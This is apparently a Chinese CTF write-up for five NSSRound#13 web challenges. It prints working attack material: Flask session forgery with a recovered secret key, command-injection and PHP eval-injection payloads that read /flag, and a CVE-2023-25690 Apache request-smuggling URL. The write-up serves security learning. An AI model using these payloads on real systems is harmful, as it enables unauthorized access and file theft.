[NSSRound#13 Basic] 刷题记录

文章目录

    • [[NSSRound#13 Basic]flask?jwt?](#13 Basic]flask?jwt?)
    • [[NSSRound#13 Basic]ez_factors](#13 Basic]ez_factors)
    • [[NSSRound#13 Basic]flask?jwt?(hard)](#13 Basic]flask?jwt?(hard))
    • [[NSSRound#13 Basic]信息收集](#13 Basic]信息收集)
    • [[NSSRound#13 Basic]MyWeb](#13 Basic]MyWeb)

[NSSRound#13 Basic]flask?jwt?

考点:session伪造

打开题目,想注册admin发现不行(暗示很明显了)

那么我们随便注册一个登陆进去,想拿flag发现不是admin

猜测这里考点是session伪造

我们在忘记密码的页面找到密钥

然后利用工具flask-session-cookie

先解密

python flask_session_cookie_manager3.py decode -s "th3f1askisfunny" -c ".eJwlzjsOwjAMANC7ZGaI48SOe5nK8UewtnRC3J1KrG96n7LnEeezbO_jikfZX162gmswavTR0k2H0JIq3o0VPZhVeoVkCLyVpyO5VA2WvAXIl3MjcJuVwkiMcZmiVkGqYp4NQyjH8hFIM6F7qC2CCRiu3Gu5I9cZx3_TyvcH8tkwDA.ZPnLwg.GAgeK3Ru7jXj9-2no9xRCYCkhvA"

得到

{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '2'}

那么我们想伪造admin的话,猜测_user_id: 1

加密一下

python flask_session_cookie_manager3.py encode -s "th3f1askisfunny" -t "{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '1'}"

得到加密后字符串,回到拿flag页面bp抓包

修改session得到flag

[NSSRound#13 Basic]ez_factors

考点:od命令

打开题目,给了一个超链接
跳转到./factor,并且不难发现114514被分解成质因数
提示了flag在根目录,我们尝试直接读取

/114514;cat /flag

发现斜杠应该是被过滤了,不然应该跟空格一样

/114514;cat %2fflag

发现只能读出来数字,那么可以使用od命令,把它转换成八进制

/114514;od %2fflag

脚本

dump = "0000000 051516 041523 043124 062173 030466 062141 034544 026543 0000020 063060 033142 032055 033063 026466 033470 061545 032455 0000040 030064 034146 030461 061144 032463 076541 000012 0000055"
octs = [("0o" + n) for n in  dump.split(" ") if n]
hexs = [int(n, 8) for n in octs]
result = ""
for n in hexs:
    if (len(hex(n)) > 4):
        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)
        result += swapped[2:].zfill(4)
print(bytes.fromhex(result).decode())

得到flag

[NSSRound#13 Basic]flask?jwt?(hard)

考点:session伪造

随便注册一个用户,登录点击拿flag
发现不是admin,回到刚刚拿flag界面,发现有hint

访问一下,给了我们时间
我们用Flask-Unsign进行cookie解密

发现刚好cookie有对应正确的时间
由于还不知道key

我们尝试随便修改下刚刚的session值,发现报错信息有key

拿到key后伪造session(在time的值加上单引号)
回到拿flag处,bp抓包修改session值,得到flag

[NSSRound#13 Basic]信息收集

考点:Apache HTTP Server 请求走私漏洞(CVE-2023-25690)

打开题目没有什么线索

然后查看网络,发现服务器为Apache/2.4.55 (Unix)

网上搜一下就可以知道存在Apache HTTP Server 请求走私漏洞(CVE-2023-25690)
参考文章

按照参考文章,我们要先去查看conf/httpd.conf是否添加以下模块

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule rewrite_module modules/mod_rewrite.so

由于不知道参数,御剑扫一下得到源码
那么我们就可以读取看上面三个模块是否开启

Apache默认安装httpd.conf在/usr/local/apache2/conf/httpd.conf

?file=/usr/local/apache2/conf/httpd.conf

依次找到,那么我们就可以跟着文章来,进行HTTP走私

本题RewriteRule如下

RewriteEngine on RewriteRule "^/nssctf/(.*)" "http://backend-server:8080/index.php?id=$1" [P] ProxyPassReverse "/nssctf/" "http://backend-server:8080/" 

也就是说路径为./nssctf/,然后根据文章修改payload

原payload

/nssctf/abc%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aUser-Agent:%20curl/7.68.0%0d%0a%0d%0a' + hexdata + b'GET%20/flag.txt

http://node4.anna.nssctf.cn:28916/nssctf/abc%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0AUser-Agent:%20curl/7.68.0%0D%0A%0D%0AGET%20/flag.txt

会被直接拼接到请求报文中发给后端服务器,造成了请求走私

拼接结果相当于

GET /index.php?file=abc HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.68.0

GET /flag.txt

(这里%0d%0a是windows中的换行符)

得到flag

[NSSRound#13 Basic]MyWeb

考点:代码审计

 <?php
error_reporting(E_ALL);
// 写了个网页存储JSON数据,但是还不会处理json格式,这样处理应该没有什么问题吧

if ($_GET['mode'] == 'save') {
    $data = file_get_contents('/tmp/data.json');
    $value = addslashes($_GET['value']);
    $data = str_replace(']', ", '$value']", $data);
    file_put_contents('/tmp/data.json', $data);
} else if ($_GET['mode'] == 'read') {
    $data = file_get_contents('/tmp/data.json');
    eval('$data = ' . $data . ';');
    print_r($data);
} else {
    highlight_file(__FILE__);
} 

分析一下,出题人写了两个模式

  1. save模式下,首先读取/tmp/data.json这个文件,然后addslashes函数防转义(可参考sql注入中防转义),然后添加数值,最后写入进去
  2. read模式下,读取文件,然后eval函数将其解析为 PHP 代码,并将结果赋给 $data 变量。

我们可以在本地测试下

假如json数据为

[1,"Leaf",1234]

如果我们传入value为114514

那么文件内容变为

[1,"Leaf",1234,114514]

在json中注释符为//,所以我们可以注释掉后面的代码

如果要达到命令执行,可以结合换行符和分号。再考虑到防止转义,那么就用反引号绕过

payload

?mode=save&value=]//%0a;echo `cat /flag`;//

执行结果

[1,"Leaf",1234, ']//
;echo `cat/flag`;//']

结果不行
我们将空格url编码一下

?mode=save&value=]//%0a;echo%20`cat%20/flag`;//

得到flag

相关推荐
大G哥4 分钟前
python 数据类型----可变数据类型
linux·服务器·开发语言·前端·python
网安-轩逸15 分钟前
【网络安全】身份认证
网络·安全·web安全
hong_zc28 分钟前
初始 html
前端·html
赛丽曼30 分钟前
Python中的HTML
python·html
小小吱33 分钟前
HTML动画
前端·html
luky!38 分钟前
算法--解决熄灯问题
python·算法
深度学习lover1 小时前
<项目代码>YOLOv8 番茄识别<目标检测>
人工智能·python·yolo·目标检测·计算机视觉·番茄识别
IT古董1 小时前
【机器学习】机器学习中用到的高等数学知识-1.线性代数 (Linear Algebra)
人工智能·python·线性代数·机器学习
糊涂涂是个小盆友1 小时前
前端 - 使用uniapp+vue搭建前端项目(app端)
前端·vue.js·uni-app
生信与遗传解读1 小时前
基于python的线性代数相关计算
python·线性代数·机器学习